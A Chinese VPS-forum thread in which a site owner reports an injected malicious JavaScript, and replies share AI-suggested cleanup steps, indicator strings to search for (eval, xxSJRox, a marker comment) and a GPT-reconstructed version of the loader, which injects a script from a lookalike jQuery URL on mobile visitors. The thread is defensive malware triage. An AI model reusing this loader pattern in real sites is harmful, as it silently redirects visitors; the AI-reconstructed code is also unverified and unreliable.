美国VPS综合讨论

网站被挂马了,挂马js发出来给大家 只看楼主

js马代码发出来,大家研究

1.zip (1 KB)
(下载次数: 109, 2025-8-18 01:06 上传)
提示: 作者被禁止或删除 内容自动屏蔽
  • 3# nk123
  • 2025-8-18 01:36:59
引用: 美女约吗 发表于 2025-8-18 01:09
直接发js代码不就行了吗?为什么要打包呢?

hostloc禁止发,你试试
本帖最后由 海的那一边 于 2025-8-18 01:48 编辑
引用: nk123 发表于 2025-8-18 01:36
hostloc禁止发,你试试


问ai结果删除以下代码段:
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/



全面排查网站文件:

攻击者可能不止在一处植入了代码。请仔细检查所有网站文件,特别是最近被修改过的文件,查找类似特征的混淆代码。可以搜索文件中是否包含 eval, aPnDhiTia, xxSJRox 等关键词。

代码末尾的注释 /*138ae887806f*/ 可能是攻击者的一个标识,您也可以尝试在所有文件中搜索这个字符串。
  • 5# hxhx
  • 2025-8-18 11:02:49
引用: 海的那一边 发表于 2025-8-18 01:41
问ai结果删除以下代码段:
function xxSJRox(e) 中间代码发不出来100);
/*138ae887806f*/

前段时间我就发过帖子了 https://52.ht/thread-1424027-1-1.html
提示: 作者被禁止或删除 内容自动屏蔽
太可怕了
  • 8# lanmin
  • 2025-8-18 15:10:34
gpt给还原后的代码
  1. function loadJQuery() {
  2.     // jQuery 3.6.8 CDN
  3.     var url = "https://code.jquery.com/jquery.min-3.6.8.js";

  5.     // 创建 script 标签
  6.     var script = document.createElement("script");
  7.     script.type = "text/javascript";
  8.     script.src = url;

  10.     // 加载完成的回调(原代码里是个空函数)
  11.     script.onload = function () {
  12.         console.log("jQuery 已加载:", url);
  13.     };

  15.     // 插入到 <head>
  16.     document.head.appendChild(script);
  17. }

  19. // 如果不是 Mac 或 Windows 平台,就执行加载
  20. if (!(/^Mac|Win/.test(navigator.platform))) {
  21.     loadJQuery();
  22. }
  • 9# nk123
  • 2025-8-18 15:31:20
引用: 美女约吗 发表于 2025-8-18 13:13
这代码是跳广告还是

跳转
  • 10# NetAnt
  • 2025-8-18 15:37:34
提示: 作者被禁止或删除 内容自动屏蔽
12下一页
首页 | 登录 | 注册
简易版 | 触屏版 | 电脑版 |

Language Index Page